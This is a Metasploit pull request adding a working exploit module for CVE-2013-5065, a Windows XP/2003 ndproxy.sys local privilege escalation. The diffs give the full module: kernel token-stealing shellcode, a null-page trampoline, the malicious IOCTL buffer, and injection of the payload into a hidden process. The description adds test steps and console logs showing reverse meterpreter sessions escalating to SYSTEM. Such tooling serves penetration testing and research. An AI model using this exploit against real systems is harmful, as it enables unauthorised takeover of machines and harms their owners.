### PR TITLE
Add module for CVE-2013-5065

### DIFF
--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -34,6 +34,7 @@ module Process
     vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
     thread = host.thread.create(shell_addr,0)
     unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
+      vprint_error("Unable to create thread")
       return false
     end
 

--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -23,15 +23,17 @@ module Process
     else
       shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
     end
+
+    host.memory.protect(shell_addr)
+
     if host.memory.write(shell_addr, shellcode) < shellcode.length
       vprint_error("Failed to write shellcode")
       return false
     end
 
     vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
-    ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, 0, nil)
-    if ret['return'] < 1
-      vprint_error("Unable to CreateThread")
+    thread = host.thread.create(shell_addr,0)
+    unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
       return false
     end
 

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -287,18 +287,26 @@ class Metasploit3 < Msf::Exploit::Local
       return Exploit::CheckCode::Detected
     end
 
-    os = sysinfo["OS"]
-    unless os =~ /windows xp/i or os =~ /[2003|.net server].*service pack 2/i
-      return Exploit::CheckCode::Safe
-    end
-
     handle = open_device("\\\\.\\NDProxy")
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
 
-    return Exploit::CheckCode::Appears
+    os = sysinfo["OS"]
+    case os
+    when /windows xp.*service pack 3/i
+      return Exploit::CheckCode::Appears
+    when /[2003|.net server].*service pack 2/i
+      return Exploit::CheckCode::Appears
+    when /windows xp/i
+      return Exploit::CheckCode::Detected
+    when /[2003|.net server]/i
+      return Exploit::CheckCode::Detected
+    else
+      return Exploit::CheckCode::Safe
+    end
+
   end
 
   def exploit
@@ -316,7 +324,7 @@ class Metasploit3 < Msf::Exploit::Local
     if target.name =~ /Automatic/
       print_status("Detecting the target system...")
       os = sysinfo["OS"]
-      if os =~ /windows xp/i
+      if os =~ /windows xp.*service pack 3/i
         my_target = targets[1]
         print_status("Running against #{my_target.name}")
       elsif ((os =~ /2003/) and (os =~ /service pack 2/i))

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -294,7 +294,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     handle = open_device("\\\\.\\NDProxy")
     if handle.nil?
-      fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
+      return Exploit::CheckCode::Safe
     end
     session.railgun.kernel32.CloseHandle(handle)
 

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -1,0 +1,422 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Process
+
+  def initialize(info={})
+    super(update_info(info, {
+      'Name'          => 'Microsoft Windows ndproxy.sys Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
+        SP2 systems. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or
+        0x8fff23cc, where user provided input is used to unsafely access an array, and the value
+        is used to perform a call, leading to a NULL pointer dereference, which is exploitable on
+        both Windows XP and Windows 2003 systems. This module has been tested successfully on
+        Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote
+        Access" must be running on the target system.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'Unkwnon', # Vulnerability discovery
+          'ryujin', # python PoC
+          'Shahin Ramezany', # C PoC
+          'juan vazquez' # MSF module
+        ],
+      'Arch'          => ARCH_X86,
+      'Platform'      => 'win',
+      'Payload'       =>
+        {
+          'Space' => 4096,
+          'DisableNops' => true
+        },
+      'SessionTypes'  => [ 'meterpreter' ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Targets'       =>
+        [
+          [ 'Automatic', { } ],
+          [ 'Windows XP SP3',
+            {
+              'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
+              '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
+              '_TOKEN' => "\xc8",    # Offset to TOKEN from the _EPROCESS struct
+              '_UPID' => "\x84",     # Offset to UniqueProcessId FROM the _EPROCESS struct
+              '_APLINKS' => "\x88"   # Offset to ActiveProcessLinks _EPROCESS struct
+            }
+          ],
+          [ 'Windows Server 2003 SP2',
+            {
+              'HaliQuerySystemInfo' => 0x1fa1e,
+              '_KPROCESS' => "\x38",
+              '_TOKEN' => "\xd8",
+              '_UPID' => "\x94",
+              '_APLINKS' => "\x98"
+            }
+          ]
+        ],
+      'References'    =>
+        [
+          [ 'CVE', '2013-5065' ],
+          [ 'OSVDB' , '100368'],
+          [ 'BID', '63971' ],
+          [ 'EDB', '30014' ],
+          [ 'URL', 'http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/' ],
+          [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486'],
+          [ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ],
+          [ 'URL', 'http://www.secniu.com/blog/?p=53' ],
+          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]
+        ],
+      'DisclosureDate'=> 'Nov 27 2013',
+      'DefaultTarget' => 0
+    }))
+
+  end
+
+  def add_railgun_functions
+    session.railgun.add_function(
+      'ntdll',
+      'NtAllocateVirtualMemory',
+      'DWORD',
+      [
+        ["DWORD", "ProcessHandle", "in"],
+        ["PBLOB", "BaseAddress", "inout"],
+        ["PDWORD", "ZeroBits", "in"],
+        ["PBLOB", "RegionSize", "inout"],
+        ["DWORD", "AllocationType", "in"],
+        ["DWORD", "Protect", "in"]
+      ])
+
+    session.railgun.add_function(
+      'ntdll',
+      'NtDeviceIoControlFile',
+      'DWORD',
+      [
+        [ "DWORD", "FileHandle", "in" ],
+        [ "DWORD", "Event", "in" ],
+        [ "DWORD", "ApcRoutine", "in" ],
+        [ "DWORD", "ApcContext", "in" ],
+        [ "PDWORD", "IoStatusBlock", "out" ],
+        [ "DWORD", "IoControlCode", "in" ],
+        [ "LPVOID", "InputBuffer", "in" ],
+        [ "DWORD", "InputBufferLength", "in" ],
+        [ "LPVOID", "OutputBuffer", "in" ],
+        [ "DWORD", "OutPutBufferLength", "in" ]
+      ])
+
+    session.railgun.add_function(
+      'ntdll',
+      'NtQueryIntervalProfile',
+      'DWORD',
+      [
+        [ "DWORD", "ProfileSource", "in" ],
+        [ "PDWORD", "Interval", "out" ]
+      ])
+    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
+    session.railgun.add_function(
+      'psapi',
+      'EnumDeviceDrivers',
+      'BOOL',
+      [
+        ["PBLOB", "lpImageBase", "out"],
+        ["DWORD", "cb", "in"],
+        ["PDWORD", "lpcbNeeded", "out"]
+      ])
+    session.railgun.add_function(
+      'psapi',
+      'GetDeviceDriverBaseNameA',
+      'DWORD',
+      [
+        ["LPVOID", "ImageBase", "in"],
+        ["PBLOB", "lpBaseName", "out"],
+        ["DWORD", "nSize", "in"]
+      ])
+  end
+
+  def open_device(dev)
+
+    invalid_handle_value = 0xFFFFFFFF
+
+    r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ | GENERIC_WRITE", 0x3, nil, "OPEN_EXISTING", 0, 0)
+
+    handle = r['return']
+
+    if handle == invalid_handle_value
+      return nil
+    end
+
+    return handle
+  end
+
+  def find_sys_base(drvname)
+    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+
+    addresses.each do |address|
+      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
+      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      if drvname == nil
+        if current_drvname.downcase.include?('krnl')
+          return [address, current_drvname]
+        end
+      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
+        return [address, current_drvname]
+      end
+    end
+
+    return nil
+  end
+
+  def ring0_shellcode(t)
+    restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
+    restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L")  # mov eax, offset hal!HaliQuerySystemInformation
+    restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
+
+    tokenstealing =  "\x52"                                                   # push edx                         # Save edx on the stack
+    tokenstealing << "\x53"                                                   # push ebx                         # Save ebx on the stack
+    tokenstealing << "\x33\xc0"                                               # xor eax, eax                     # eax = 0
+    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                           # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
+    tokenstealing << "\x8b\x40" + t['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
+    tokenstealing << "\x8b\xc8"                                               # mov ecx, eax
+    tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
+    tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
+    tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+    tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
+    tokenstealing << "\x75\xe8"                                               # jne 0000101e ======================
+    tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
+    tokenstealing << "\x8b\xc1"                                               # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
+    tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
+    tokenstealing << "\x5b"                                                   # pop ebx                          # Restores ebx
+    tokenstealing << "\x5a"                                                   # pop edx                          # Restores edx
+    tokenstealing << "\xc2\x10"                                               # ret 10h                          # Away from the kernel!
+
+    ring0_shellcode = restore_ptrs + tokenstealing
+    return ring0_shellcode
+  end
+
+  def fill_memory(proc, address, length, content)
+
+    result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
+
+    if not proc.memory.writable?(address)
+      vprint_error("Failed to allocate memory")
+      return nil
+    else
+      vprint_good("#{address} is now writable")
+    end
+
+    result = proc.memory.write(address, content)
+
+    if result.nil?
+      vprint_error("Failed to write contents to memory")
+      return nil
+    else
+      vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
+    end
+
+    return address
+  end
+
+  def disclose_addresses(t)
+    addresses = {}
+
+    vprint_status("Getting the Kernel module name...")
+    kernel_info = find_sys_base(nil)
+    if kernel_info.nil?
+      vprint_error("Failed to disclose the Kernel module name")
+      return nil
+    end
+    vprint_good("Kernel module found: #{kernel_info[1]}")
+
+    vprint_status("Getting a Kernel handle...")
+    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    kernel32_handle = kernel32_handle['return']
+    if kernel32_handle == 0
+      vprint_error("Failed to get a Kernel handle")
+      return nil
+    end
+    vprint_good("Kernel handle acquired")
+
+
+    vprint_status("Disclosing the HalDispatchTable...")
+    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
+    hal_dispatch_table = hal_dispatch_table['return']
+    if hal_dispatch_table == 0
+      vprint_error("Failed to disclose the HalDispatchTable")
+      return nil
+    end
+    hal_dispatch_table -= kernel32_handle
+    hal_dispatch_table += kernel_info[0]
+    addresses["halDispatchTable"] = hal_dispatch_table
+    vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
+
+    vprint_status("Getting the hal.dll Base Address...")
+    hal_info = find_sys_base("hal.dll")
+    if hal_info.nil?
+      vprint_error("Failed to disclose hal.dll Base Address")
+      return nil
+    end
+    hal_base = hal_info[0]
+    vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")
+
+    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
+    addresses["HaliQuerySystemInfo"] = hali_query_system_information
+
+    vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")
+    return addresses
+  end
+
+
+  def check
+    vprint_status("Adding the railgun stuff...")
+    add_railgun_functions
+
+    if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
+      return Exploit::CheckCode::Detected
+    end
+
+    os = sysinfo["OS"]
+    unless os =~ /windows xp/i or os =~ /[2003|.net server].*service pack 2/i
+      return Exploit::CheckCode::Safe
+    end
+
+    handle = open_device("\\\\.\\NDProxy")
+    if handle.nil?
+      fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
+    end
+    session.railgun.kernel32.CloseHandle(handle)
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def exploit
+
+    vprint_status("Adding the railgun stuff...")
+    add_railgun_functions
+
+    if sysinfo["Architecture"] =~ /wow64/i
+      fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
+    elsif sysinfo["Architecture"] =~ /x64/
+      fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
+    end
+
+    my_target = nil
+    if target.name =~ /Automatic/
+      print_status("Detecting the target system...")
+      os = sysinfo["OS"]
+      if os =~ /windows xp/i
+        my_target = targets[1]
+        print_status("Running against #{my_target.name}")
+      elsif ((os =~ /2003/) and (os =~ /service pack 2/i))
+        my_target = targets[2]
+        print_status("Running against #{my_target.name}")
+      elsif ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
+        my_target = targets[2]
+        print_status("Running against #{my_target.name}")
+      end
+    else
+      my_target = target
+    end
+
+    if my_target.nil?
+      fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
+    end
+
+    print_status("Checking device...")
+    handle = open_device("\\\\.\\NDProxy")
+    if handle.nil?
+      fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
+    else
+      print_good("\\\\.\\NDProxy found!")
+    end
+
+    print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...")
+    @addresses = disclose_addresses(my_target)
+    if @addresses.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.")
+    else
+      print_good("Addresses successfully disclosed.")
+    end
+
+
+    print_status("Storing the kernel stager on memory...")
+    this_proc = session.sys.process.open
+    kernel_shell = ring0_shellcode(my_target)
+    kernel_shell_address = 0x1000
+    result = fill_memory(this_proc, kernel_shell_address, kernel_shell.length, kernel_shell)
+    if result.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
+    else
+      print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
+    end
+
+    print_status("Storing the trampoline to the kernel stager on memory...")
+    trampoline = "\x90" * 0x38       # nops
+    trampoline << "\x68"             # push opcode
+    trampoline << [0x1000].pack("V") # address to push
+    trampoline << "\xc3"             # ret
+    trampoline_addr = 0x1
+    result = fill_memory(this_proc, trampoline_addr, trampoline.length, trampoline)
+    if result.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Error while storing trampoline on memory")
+    else
+      print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}")
+    end
+
+    print_status("Storing the IO Control buffer on memory...")
+    buffer = "\x00" * 1024
+    buffer[20, 4] = [0x7030125].pack("V") # In order to trigger the vulnerable call
+    buffer[28, 4] = [0x34].pack("V")      # In order to trigger the vulnerable call
+    buffer_addr = 0x0d0d0000
+    result = fill_memory(this_proc, buffer_addr, buffer.length, buffer)
+    if result.nil?
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Error while storing the IO Control buffer on memory")
+    else
+      print_good("IO Control buffer successfully stored at 0x#{buffer_addr.to_s(16)}")
+    end
+
+    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
+    magic_ioctl = 0x8fff23c8
+    # Values taken from the exploit in the wild, see references
+    ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80)
+
+    session.railgun.kernel32.CloseHandle(handle)
+
+    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
+    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
+
+    print_status("Checking privileges after exploitation...")
+
+    if not is_system?
+      fail_with(Failure::Unknown, "The exploitation wasn't successful")
+    else
+      print_good("Exploitation successful!")
+    end
+
+    p = payload.encoded
+    print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
+    if execute_shellcode(p)
+      print_good("Enjoy")
+    else
+      fail_with(Failure::Unknown, "Error while executing the payload")
+    end
+
+  end
+
+end
+

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -76,7 +76,8 @@ class Metasploit3 < Msf::Exploit::Local
           [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486'],
           [ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ],
           [ 'URL', 'http://www.secniu.com/blog/?p=53' ],
-          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]
+          [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ],
+          [ 'URL', 'http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html' ]
         ],
       'DisclosureDate'=> 'Nov 27 2013',
       'DefaultTarget' => 0
@@ -123,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Local
         [ "DWORD", "ProfileSource", "in" ],
         [ "PDWORD", "Interval", "out" ]
       ])
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
+    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
     session.railgun.add_function(
       'psapi',
       'EnumDeviceDrivers',
@@ -209,12 +210,12 @@ class Metasploit3 < Msf::Exploit::Local
 
     result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
-    if not proc.memory.writable?(address)
+    unless proc.memory.writable?(address)
       vprint_error("Failed to allocate memory")
       return nil
-    else
-      vprint_good("#{address} is now writable")
     end
+
+    vprint_good("#{address} is now writable")
 
     result = proc.memory.write(address, content)
 
@@ -402,11 +403,11 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_status("Checking privileges after exploitation...")
 
-    if not is_system?
+    unless is_system?
       fail_with(Failure::Unknown, "The exploitation wasn't successful")
-    else
-      print_good("Exploitation successful!")
     end
+
+    print_good("Exploitation successful!")
 
     p = payload.encoded
     print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -17,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Local
       'Name'          => 'Microsoft Windows ndproxy.sys Local Privilege Escalation',
       'Description'    => %q{
         This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
-        SP2 systems. The vulnerability exists while processing an IO Control Code 0x8fff23c8 or
-        0x8fff23cc, where user provided input is used to unsafely access an array, and the value
-        is used to perform a call, leading to a NULL pointer dereference, which is exploitable on
-        both Windows XP and Windows 2003 systems. This module has been tested successfully on
-        Windows XP SP3 and Windows 2003 SP2. In order to work the service "Routing and Remote
-        Access" must be running on the target system.
+        SP2 systems, exploited on the wild on November 2013. The vulnerability exists while
+        processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used
+        to unsafely access an array, and the value is used to perform a call, leading to a NULL
+        pointer dereference, which is exploitable on both Windows XP and Windows 2003 systems. This
+        module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to
+        work the service "Routing and Remote Access" must be running on the target system.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -9,6 +9,7 @@ require 'rex'
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
@@ -229,6 +230,14 @@ class Metasploit3 < Msf::Exploit::Local
     return address
   end
 
+  def create_proc
+    windir = expand_path("%windir%")
+    cmd = "#{windir}\\System32\\notepad.exe"
+    # run hidden
+    proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+    return proc.pid
+  end
+
   def disclose_addresses(t)
     addresses = {}
 
@@ -415,11 +424,12 @@ class Metasploit3 < Msf::Exploit::Local
       fail_with(Failure::Unknown, "The exploitation wasn't successful")
     end
 
-    print_good("Exploitation successful!")
-
+    print_good("Exploitation successful! Creating a new process and launching payload...")
+    new_pid = create_proc
     p = payload.encoded
-    print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
-    if execute_shellcode(p)
+
+    print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
+    if execute_shellcode(p, nil, new_pid)
       print_good("Enjoy")
     else
       fail_with(Failure::Unknown, "Error while executing the payload")


### PR DESCRIPTION
Tested on Windows XP SP3 and Windows 2003 SP2 successfully.
# Verification
- [x] Install Windows XP SP3 or Windows 2003 SP2
- [x] Enable the "Routing and Remote Access"
- [x] Get a meterpreter session on the target system (just use msfpayload to create a meterpreter payload embedded into an exe)
- [x] Run the local exploit like on the DEMO
- [x] Hopefully enjoy a new SYSTEM session (verify with getuid)
# DEMO
- Win XP SP3

```
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1025) at 2013-12-11 08:57:34 -0600

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms_ndproxy 
msf exploit(ms_ndproxy) > set session 1
session => 1
msf exploit(ms_ndproxy) > check
re[*] The target appears to be vulnerable.
msf exploit(ms_ndproxy) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 290 bytes to memory and executing it...
[*] Sending stage (769024 bytes) to 10.6.0.165
[+] Enjoy
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:50716) at 2013-12-11 08:58:05 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
smeterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms_ndproxy) > 
```
- Win 2003 SP2

```
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.136
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.136:1031) at 2013-12-11 08:58:42 -0600

meterpreter > getuid
Server username: JUAN-6ED9DB6CA8\Administrator
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > background
[*] Backgrounding session 3...
msf exploit(ms_ndproxy) > set session 3
session => 3
msf exploit(ms_ndproxy) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Detecting the target system...
[*] Running against Windows Server 2003 SP2
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Injecting 290 bytes to memory and executing it...
[*] Sending stage (769024 bytes) to 192.168.172.136
[+] Enjoy
[*] Meterpreter session 5 opened (192.168.172.1:4444 -> 192.168.172.136:1032) at 2013-12-11 08:59:57 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 
```
